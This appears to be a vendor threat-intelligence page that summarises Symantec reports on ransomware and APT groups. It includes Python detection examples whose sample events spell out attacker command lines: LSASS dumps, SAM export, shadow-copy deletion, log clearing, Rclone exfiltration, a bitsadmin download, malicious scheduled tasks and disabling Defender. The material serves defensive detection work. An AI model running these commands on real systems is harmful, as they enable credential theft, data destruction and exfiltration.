Ransomware Attack Techniques

May 03, 2022

Ransomware Attack Techniques

Industry: N/A | Level: Tactical | Source: Symantec

Symantec’s analysis of the ransomware groups Hive, Conti, and Avoslocker has identified frequently used tools, tactics, and procedures (TTPs). During the initial access stage, the ransomware operators leverage exploits, RDP with weak or compromised credentials, and malware delivered through phishing emails carrying IcedID, Emotet, QakBot, or TrickBot. Persistence involved third-party remote access software such as AnyDesk and ConnectWise Control, along with modifications to the firewall and registry. Tools used for system discovery include ADRecon and Netscan. Credential access is achieved with a wide range of techniques, including Mimikatz, comsvcs.dll, extracting credentials from the registry, and using Task Manager to dump LSASS memory. Tools used for lateral movement include PsExec, WMI, BITSAdmin, and Mimikatz. Tampering with Windows event logs helped cover the attackers’ tracks, and data recovery is inhibited by deleting shadow copies. Lastly, for data exfiltration, the actors relied on Rclone and FileZilla to transfer data.

  • Anvilogic Use Cases:
    • Registry key added with reg.exe
    • Windows Firewall Rule Creation
    • Mimikatz
    • Invoke-Expression Command
    • comsvcs.dll Lsass Memory Dump
    • Rundll32 Command Line
    • Task Manager lsass Dump
    • Credentials in Registry
    • Remote Admin Tools
    • WinRM Tools
    • BITSadmin Execution
    • Clear Windows Event Logs
    • Inhibit System Recovery Commands
    • Suspicious Registry Key Deleted
    • Rclone Execution
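Most of the TTPs in this summary leave a distinctive command line in process-creation telemetry, and several of the use cases listed above (comsvcs.dll Lsass Memory Dump, Credentials in Registry, Inhibit System Recovery Commands, Clear Windows Event Logs, Rclone Execution, BITSadmin Execution) can be expressed as command-line rules. The Python below is an added example written for this page, not Anvilogic or Symantec code. The events, hostnames, users, PIDs, paths, and regexes are constructed assumptions, and the ATT&CK technique IDs are an assumed mapping. Beyond single-rule matching, it shows the check a practitioner wants on top: correlating distinct techniques per host, so that a credential dump followed by shadow-copy deletion and Rclone on one machine stands out from an isolated hit.

```python
import json
import re

# Constructed Sysmon-style process-creation events (Event ID 1 reduced to
# host, user, image and command line) modelled on the TTPs in the Symantec
# summary above. Hostnames, users, PIDs and paths are assumptions for this
# example, not data from the report.
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "CORP\\jdoe", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\temp\lsass.dmp full"},
    {"host": "WS01", "user": "CORP\\jdoe", "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg save HKLM\SAM C:\temp\sam.hiv"},
    {"host": "FS01", "user": "CORP\\svc_backup", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": r"vssadmin delete shadows /all /quiet"},
    {"host": "FS01", "user": "CORP\\svc_backup", "image": r"C:\Windows\System32\wevtutil.exe",
     "cmdline": r"wevtutil cl Security"},
    {"host": "FS01", "user": "CORP\\svc_backup", "image": r"C:\Users\Public\rclone.exe",
     "cmdline": r"rclone.exe copy \\FS01\finance remote:exfil --transfers 16"},
    {"host": "WS02", "user": "CORP\\asmith", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer job1 http://198.51.100.7/a.exe C:\Users\Public\a.exe"},
    # Benign noise: an administrator listing shadow copies, and rundll32 with a system DLL.
    {"host": "WS03", "user": "CORP\\admin", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": r"vssadmin list shadows"},
    {"host": "WS03", "user": "CORP\\admin", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe shell32.dll,Control_RunDLL"},
]

# Each rule: detection name (matching the use-case list above), a regex over
# the command line, and the ATT&CK technique it is mapped to (assumed mapping).
RULES = [
    ("comsvcs.dll Lsass Memory Dump",
     re.compile(r"comsvcs\.dll.*MiniDump", re.I), "T1003.001"),
    ("Credentials in Registry",
     re.compile(r"\breg(\.exe)?\s+save\s+HKLM\\(SAM|SECURITY|SYSTEM)\b", re.I), "T1003.002"),
    ("Inhibit System Recovery Commands",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows|wmic\s+shadowcopy\s+delete|wbadmin\s+delete\s+catalog", re.I), "T1490"),
    ("Clear Windows Event Logs",
     re.compile(r"wevtutil(\.exe)?\s+(cl|clear-log)\b", re.I), "T1070.001"),
    ("Rclone Execution",
     re.compile(r"\brclone(\.exe)?\s+(copy|sync|move)\b", re.I), "T1567.002"),
    ("BITSadmin Execution",
     re.compile(r"bitsadmin(\.exe)?\s+/transfer\b", re.I), "T1197"),
]


def evaluate(event, rules=RULES):
    """Return the (detection_name, technique) pairs that fire for one event."""
    cmd = event.get("cmdline", "")
    return [(name, technique) for name, pattern, technique in rules if pattern.search(cmd)]


def correlate(events, rules=RULES, min_distinct=2):
    """Group hits per host and keep only hosts where at least `min_distinct`
    different techniques fired: a chain of credential access, recovery
    inhibition and exfiltration on one box is the ransomware signal, while a
    lone bitsadmin transfer is left for lower-priority triage."""
    per_host = {}
    for ev in events:
        for _name, technique in evaluate(ev, rules):
            per_host.setdefault(ev["host"], set()).add(technique)
    return {host: sorted(techs) for host, techs in per_host.items() if len(techs) >= min_distinct}


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        for name, technique in evaluate(ev):
            print(f"{ev['host']:5} {technique:10} {name}: {ev['cmdline']}")
    print(json.dumps(correlate(SAMPLE_EVENTS), indent=2))
```

With the constructed events, WS01 (LSASS dump plus SAM hive export) and FS01 (shadow-copy deletion, log clearing, Rclone) clear the two-technique threshold, while WS02's single bitsadmin download and WS03's benign commands do not. In production the per-host grouping should also be bounded by a time window, and the comsvcs.dll rule should be paired with a check that the loading image is rundll32 from System32, since the DLL is a legitimate component and the command line alone is what makes it a dump.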

Lazarus Operation Dream Job

April 19, 2022

Lazarus Operation Dream Job

Industry: Chemical & Information Technology | Level: Tactical | Source: Symantec

Symantec’s tracking of Lazarus, a North Korean advanced persistent threat (APT) group, has identified Operation Dream Job activity targeting the chemical and information technology sectors in South Korea since January 2022. Although the information technology sector was targeted, the attacks are believed to have been intended to pivot into the chemical sector. The Operation Dream Job campaign has been active since August 2020, luring victims across various sectors with fictitious job postings. A typical attack chain from the campaign involves the execution of an HTM file that downloads a malicious DLL, which is then injected into a process; Symantec has identified process injection into the “legitimate system management software INISAFE Web EX Client.” Additional activities observed included obtaining credentials by dumping registry keys, executing a BAT file, and creating scheduled tasks for persistence.

  • Anvilogic Scenario: Lazarus – Operation Dream Job – Target Chemical Sector
  • Anvilogic Use Cases:
    • Rundll32 Command Line
    • Create/Modify Schtasks
    • Suspicious File written to Disk
    • Windows FTP Exfiltration
    • Credentials in Registry
    • Executable Create Script Process
    • Rare remote thread
    • Control Panel Abuse
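The persistence step in this chain (a scheduled task, a dropped DLL run through rundll32, a BAT file) is where the Create/Modify Schtasks and Rundll32 Command Line use cases above apply, and the useful check is not "schtasks /create ran" but what the task's action actually launches. The Python below is an added example for this page, not Symantec or Anvilogic code: it parses `schtasks /create` command lines and applies path-trust heuristics to the task action. The task names, paths, schedules and the list of user-writable directories are assumptions, not indicators from the report.

```python
import re
import shlex

# Constructed `schtasks` command lines modelled on the persistence step in the
# summary above (a task launching rundll32 against a dropped DLL, and a batch
# file). Task names, paths and schedules are assumptions, not IOCs from the
# Symantec report.
SAMPLES = [
    r'schtasks /create /tn "WindowsUpdateCheck" /tr "rundll32.exe C:\Users\Public\Libraries\libreport.dll,Start" /sc minute /mo 10 /f',
    r'schtasks /create /tn "Cleanup" /tr "cmd.exe /c C:\ProgramData\svc\run.bat" /sc onlogon',
    # Benign: a vendor backup job installed under Program Files.
    r'schtasks /create /tn "Backup" /tr "C:\Program Files\Acme\backup.exe --nightly" /sc daily /st 02:00',
    r'schtasks /query /tn Backup',
]

# Directories an unprivileged user can write to on a default Windows install
# (assumed list). A task action living here deserves more scrutiny than one
# under C:\Windows\System32 or C:\Program Files.
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\", "c:\\perflogs\\")
SYSTEM_DLL_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def parse_schtasks_create(cmdline):
    """Extract /tn (name), /tr (action) and /sc (schedule) from a
    `schtasks /create` command line; return None for anything else.
    shlex in non-POSIX mode keeps Windows backslashes and quoted paths intact."""
    try:
        tokens = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    except ValueError:
        return None
    if (len(tokens) < 2 or tokens[0].lower() not in ("schtasks", "schtasks.exe")
            or tokens[1].lower() != "/create"):
        return None
    task = {"name": None, "action": None, "schedule": None}
    flags = {"/tn": "name", "/tr": "action", "/sc": "schedule"}
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() in flags:
            task[flags[tok.lower()]] = tokens[i + 1]
    return task


def action_findings(action):
    """Heuristics on the task action: rundll32 loading a DLL from outside the
    system directories, a .bat payload, or any program run from a
    user-writable directory. Returns the findings in that fixed order."""
    findings = []
    a = action.lower()
    m = re.search(r"rundll32(\.exe)?\s+([^,\s]+\.dll)", a)
    if m and not m.group(2).startswith(SYSTEM_DLL_DIRS):
        findings.append("rundll32 loading non-system DLL")
    if re.search(r"\.bat\b", a):
        findings.append("batch file persistence")
    if any(d in a for d in USER_WRITABLE):
        findings.append("action runs from user-writable path")
    return findings


def review(cmdline):
    """Full check for one command line: None if it is not a task creation
    with an action, otherwise the parsed task plus its findings."""
    task = parse_schtasks_create(cmdline)
    if task is None or task["action"] is None:
        return None
    task["findings"] = action_findings(task["action"])
    return task


if __name__ == "__main__":
    for cmd in SAMPLES:
        result = review(cmd)
        if result:
            print(f"{result['name']:20} {result['schedule'] or '-':8} {result['findings']}")
```

The two constructed malicious tasks each produce two findings while the vendor backup job produces none, and the `schtasks /query` line is ignored by the parser. Scheduled-task creation through the Task Scheduler COM API or PowerShell's Register-ScheduledTask never passes through schtasks.exe, so this command-line parser should be backed by Task Scheduler operational log events or task-file creation under C:\Windows\System32\Tasks.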

DoubleZero Wiper

March 25, 2022

March 22nd, 2022: DoubleZero Wiper

Industry: N/A | Level: Strategic | Source: Symantec

Reporting on the latest wiper, DoubleZero, remains limited. A brief analysis from Symantec identified the wiper as obfuscated .NET code that “overwrites or uses API calls to zero out critical system files and registry keys.” The list of wipers observed so far includes WhisperGate, HermeticWiper, IsaacWiper, CaddyWiper, and DoubleZero.

Antlion APT Group

February 08, 2022

Antlion APT Group

Industry: Financial & Manufacturing | Level: Tactical | Source: Symantec

Symantec reports threat activity from Antlion, a Chinese state-backed APT group. For the past 18 months the group has been actively targeting Taiwanese financial institutions, and its operations involve long dwell times: in recent attacks the group spent approximately 250 days on the network of a financial organization and 175 days on that of a manufacturing organization. The group leverages a custom backdoor, xPack. In a case study, Symantec observed the group running various commands (for example via WMI), exploiting EternalBlue, gathering credentials from the registry, running PsExec, and archiving collected data. Unexplained gaps in the threat activity further emphasize the group’s slow, methodical pace.

  • Anvilogic Use Cases:
    • WinRM Tools
    • Credentials in Registry
    • Remote Admin Tools
    • Locate Credentials

ALPHV/BlackCat ransomware – Technical Information from Symantec

December 21, 2021

ALPHV/BlackCat ransomware – Technical Information from Symantec

Industry: N/A | Level: Operational | Source: Symantec

Symantec examined the emerging ALPHV/BlackCat ransomware, which is written in the Rust programming language. In one observed attack chain, suspicious activity appeared on a victim network on November 3rd, 2021, leading to deployment of the ransomware on November 18th. Initial activity on November 3rd started with suspicious SMB requests followed by a registry dump of the Local Security Authority (LSA). Shortly after, PsExec was used to launch a command prompt that disabled ‘RestrictedAdmin mode’ in the registry. The activity then went quiet until November 18th, when PsExec was used to run PowerShell that disabled Windows Defender and added “*.exe” to an AV exclusion list. The ransomware was then deployed using PsExec. Symantec’s review of the samples determined that the attack was specifically targeted at the victim organization, as the “victim’s administrative credentials are embedded as part of the configuration block”.

  • Anvilogic Scenario: Initial ALPHV/BlackCat Ransomware – Behaviors
  • Anvilogic Use Cases:
    • ProcDump Credential Harvest
    • Task Manager lsass Dump
    • Remote Admin Tools
    • Registry key added with reg.exe

Yanluowang Ransomware Linked to Thieflock Affiliate

December 01, 2021

Yanluowang Ransomware Linked to Thieflock Affiliate

Industry: Consultancy, Engineering, Financial & Manufacturing | Level: Tactical | Source: Symantec

The Yanluowang ransomware group, active since at least August 2021, has been targeting US corporations, specifically in the financial, manufacturing, IT, consultancy, and engineering sectors. The group has been using TTPs similar to those seen in Thieflock ransomware attacks, and based on Symantec’s observations there appears to be a link, or a shift of allegiance, from Thieflock to the Yanluowang ransomware family. Notable TTP patterns include the use of BazarLoader for initial access, PowerShell to download tools and enable RDP through the registry, AdFind for reconnaissance, and various other credential-stealing tools.

  • Anvilogic Scenario: Yanluowang Ransomware – Behaviors
  • Anvilogic Use Cases:
    • RDP Enabled
    • Adfind Execution
    • pypykatz commands
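Two of the summaries above turn on registry and Defender configuration changes rather than on which tool ran: the ALPHV/BlackCat chain modified RestrictedAdmin mode through the registry and then disabled Windows Defender and added an "*.exe" exclusion via PowerShell, and the Yanluowang actors enabled RDP in the registry (the RDP Enabled and Registry key added with reg.exe use cases). A regex on "reg.exe ran" is too noisy for these, so the Python below, an added example for this page rather than Anvilogic or Symantec code, parses `reg add` into key, value name and data, and only fires when the specific key, value and data match. The literal command lines, the data values, and the Defender cmdlet syntax are assumptions; the reports quoted above describe the behaviour, not the exact commands.

```python
import re
import shlex

# Constructed command lines modelled on the two summaries: the BlackCat chain
# (RestrictedAdmin registry change, then Defender disabled and an *.exe
# exclusion added from PowerShell) and the Yanluowang RDP enablement. The
# registry data values and the PowerShell syntax are assumptions for this
# example, not commands quoted from the reports.
SAMPLES = [
    r"reg add HKLM\System\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f",
    r'powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true"',
    r'powershell.exe -Command "Add-MpPreference -ExclusionExtension *.exe"',
    r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f',
    # Benign: an application preference, and RDP being switched *off* (data 1).
    r"reg add HKCU\Software\Contoso\App /v Theme /t REG_SZ /d dark /f",
    r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f',
]

HIVE_ALIASES = {"HKEY_LOCAL_MACHINE": "HKLM", "HKEY_CURRENT_USER": "HKCU"}


def normalize_key(key):
    """Upper-case the path and fold long hive names to their short form so
    HKEY_LOCAL_MACHINE\\System\\... and hklm\\SYSTEM\\... compare equal."""
    hive, _, rest = key.strip('"').partition("\\")
    return f"{HIVE_ALIASES.get(hive.upper(), hive.upper())}\\{rest.upper()}".rstrip("\\")


def parse_reg_add(cmdline):
    """Return {key, value, type, data} for a `reg add` command, else None.
    shlex in non-POSIX mode keeps Windows backslashes and quoted keys intact."""
    try:
        tokens = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    except ValueError:
        return None
    if len(tokens) < 3 or tokens[0].lower() not in ("reg", "reg.exe") or tokens[1].lower() != "add":
        return None
    parsed = {"key": tokens[2], "value": None, "type": None, "data": None}
    flags = {"/v": "value", "/t": "type", "/d": "data"}
    for i, tok in enumerate(tokens[3:-1], start=3):
        if tok.lower() in flags:
            parsed[flags[tok.lower()]] = tokens[i + 1]
    return parsed


# (detection name, registry key, value name, required data or None for any data)
REGISTRY_RULES = [
    ("RDP Enabled", r"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server", "fDenyTSConnections", "0"),
    ("RestrictedAdmin mode tampering", r"HKLM\SYSTEM\CurrentControlSet\Control\Lsa", "DisableRestrictedAdmin", None),
]

# Defender tampering is a cmdlet call, so a regex over the whole command line
# is the right tool here; the reg parser above is skipped for these lines.
POWERSHELL_RULES = [
    ("Windows Defender disabled",
     re.compile(r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+(\$true|1)\b", re.I)),
    ("Defender exclusion added",
     re.compile(r"(Add|Set)-MpPreference\b.*-Exclusion(Path|Extension|Process)\s+\S", re.I)),
]


def classify(cmdline):
    """List the detection names that fire for one command line."""
    hits = []
    reg = parse_reg_add(cmdline)
    if reg and reg["value"]:
        for name, key, value, data in REGISTRY_RULES:
            if (normalize_key(reg["key"]) == normalize_key(key)
                    and reg["value"].lower() == value.lower()
                    and (data is None or reg["data"] == data)):
                hits.append(name)
    for name, pattern in POWERSHELL_RULES:
        if pattern.search(cmdline):
            hits.append(name)
    return hits


if __name__ == "__main__":
    for cmd in SAMPLES:
        print(classify(cmd) or ["-"], cmd)
```

The fDenyTSConnections rule requires data 0, so the benign line that sets it to 1 (disabling RDP) is left alone, while any change to DisableRestrictedAdmin is flagged regardless of value because both directions are worth a look during an intrusion. Command-line parsing only sees reg.exe; the same values written through PowerShell's Set-ItemProperty, the registry API, or Group Policy need Sysmon Event ID 13 (RegistryEvent value set) or equivalent telemetry keyed on the same key and value names.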